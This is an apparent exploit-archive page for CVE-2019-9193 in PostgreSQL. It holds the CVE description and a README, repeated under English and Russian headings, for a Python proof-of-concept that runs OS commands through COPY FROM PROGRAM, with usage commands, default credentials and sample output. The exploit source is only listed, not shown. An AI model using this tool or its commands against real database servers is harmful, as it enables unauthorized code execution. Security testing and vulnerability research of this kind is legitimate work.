Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2019-9193 PoC — PostgreSQL 操作系统命令注入漏洞

Source
https://github.com/AxthonyV/CVE-2019-9193
Associated Vulnerability
Title:PostgreSQL 操作系统命令注入漏洞 (CVE-2019-9193)
Description:In PostgreSQL 9.3 through 11.2, the "COPY TO/FROM PROGRAM" function allows superusers and users in the 'pg_execute_server_program' group to execute arbitrary code in the context of the database's operating system user. This functionality is enabled by default and can be abused to run arbitrary operating system commands on Windows, Linux, and macOS. NOTE: Third parties claim/state this is not an issue because PostgreSQL functionality for ‘COPY TO/FROM PROGRAM’ is acting as intended. References state that in PostgreSQL, a superuser can execute commands as the server user without using the ‘COPY FROM PROGRAM’.
Description
PoC tool designed to exploit an authenticated Remote Code Execution (RCE) vulnerability in certain versions of PostgreSQL (9.3 - 11.7)
Readme
# EN
**GenPostgresRCEExploit** is a PoC tool designed to exploit an authenticated Remote Code Execution (RCE) vulnerability in certain versions of PostgreSQL (9.3 - 11.7). It allows authenticated users to execute system commands on a PostgreSQL database server vulnerable to CVE-2019-9193.

## Features
- **Exploitation of RCE**: Executes system commands through an authenticated PostgreSQL session.
- **Version Check**: Checks the version of the target PostgreSQL server to confirm the presence of a vulnerability.
- **Command Execution**: Allows user commands to be executed on the server if it is vulnerable.
- **Automatic Table Management**: Creates and deletes a temporary table to execute commands without manual intervention.

## Requirements
- Python 3.x
- PostgreSQL client library (package `psycopg2`)

## Installation
1. Clone the repository:
    ``bash
    git clone https://github.com/AxthonyV/CVE-2019-9193
    cd CVE-2019-9193
    ```
2. Install the required packages:
    ```bash
    pip install -r requirements.txt
    ```

## Usage
```bash
python3 GenPostgresRCEExploit.py -i <target_ip> -p <port> -d <database_name> -U <username> -P <password> -c “<system_command>”
```

### Options
- `-i`, `--ip`: IP address of the PostgreSQL server (Default: 127.0.0.1)
- `-p`, `--port`: PostgreSQL server port (Default: 5432)
- `-d`, `--database`: PostgreSQL database name (Default: template1)
- `-U`, `--user`: Username to connect to the PostgreSQL server (Default: postgres)
- `-P`, `--password`: Password to connect to PostgreSQL server (Default: postgres)
- `-c`, `---command`: System command to be executed on the server
- `-t`, `--timeout`: Connection timeout in seconds (Default: 10)

## Example
``bash
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c “whoami”
```
This example connects to the PostgreSQL server at `192.168.1.10`, authenticates with the provided credentials, and executes the `whoami` command.

## Example output
```
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c “whoami”

[+] Connection to PostgreSQL database at 192.168.1.10:5432
[+] Connection successfully established
[+] PostgreSQL version check
[+] Vulnerable PostgreSQL version detected: 10.4
[+] Temporary table creation: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Command successfully executed

postgres
```

## Disclaimer
This tool is intended for educational purposes and ethical testing only. Unauthorized use of this tool against any systems is illegal and strictly prohibited. The authors do not take responsibility for any misuse.

# RU
**GenPostgresRCEExploit** is a PoC exploit designed to exploit remote code execution (RCE) vulnerability in certain versions of PostgreSQL (9.3 - 11.7). The program allows authenticated users to execute system commands on a PostgreSQL server vulnerable to CVE-2019-9193.

## Features
- **Exploit RCE**: Execute system commands over an authenticated connection to PostgreSQL.
- **Version Check**: Checks the version of the target PostgreSQL server for vulnerabilities.
- **Command Execution**: Allows arbitrary commands to be executed on the server in the presence of a vulnerability.
- **Table Management**: Automatically creates and deletes a temporary table for command execution.

## Requirements
- Python 3.x
- PostgreSQL client library (`psycopg2` package)

## Installation
1. Clone the repository:
    ```bash
    git clone https://github.com/geniuszly/CVE-2019-9193
    cd CVE-2019-9193
    ```
2. Install the required packages:
    ````bash
    pip install -r requirements.txt
    ```

## Usage
````bash
python3 GenPostgresRCEExploit.py -i <IP address> -p <port> -d <database_name> -U <user> -P <password> -c “<system_command>”
```

### Options
- `-i`, `--ip`: IP address of PostgreSQL server (Default: 127.0.0.1)
- `-p`, `--port`: PostgreSQL server port (Default: 5432)
- `-d`, `--database`: PostgreSQL database name (Default: template1)
- `-U`, `--user`: Username to connect to the PostgreSQL server (Default: postgres)
- `-P`, `--password`: Password to connect to PostgreSQL server (Default: postgres)
- `-c`, `--command`: System command to execute on the server
- `-t`, `--timeout`: Connection timeout in seconds (Default: 10)

## Example
```bash
python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d mydb -U myuser -P mypass -c “whoami”
```
In this example, the program connects to the PostgreSQL server at `192.168.1.10`, authenticates with the specified credentials, and executes the `whoami` command.

## Example output
```
$ python3 GenPostgresRCEExploit.py -i 192.168.1.10 -p 5432 -d testdb -U postgres -P mypassword -c “whoami”

[+] Connection to PostgreSQL database at 192.168.1.10:5432
[+] Connection successfully established
[+] PostgreSQL version check
[+] Vulnerable PostgreSQL version detected: 10.4
[+] Temporary table creation: temp_3f8b8f9e2c9c11d7bd8f7c61d4e9eaf2
[+] Command successfully executed

postgres
```

## Disclaimer
This tool is for educational purposes and legal testing only. Unauthorized use of this tool against any systems is illegal and strictly prohibited. The authors are not responsible for any misuse.
File Snapshot

 [4.0K]  /data/pocs/01016ed30d65f44bf5091b663879321a65085013
├── [4.4K]  GenPostgresRCEExploit.py
├── [1.0K]  LICENSE
├── [5.2K]  README.md
└── [  15]  requirements.txt

0 directories, 4 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →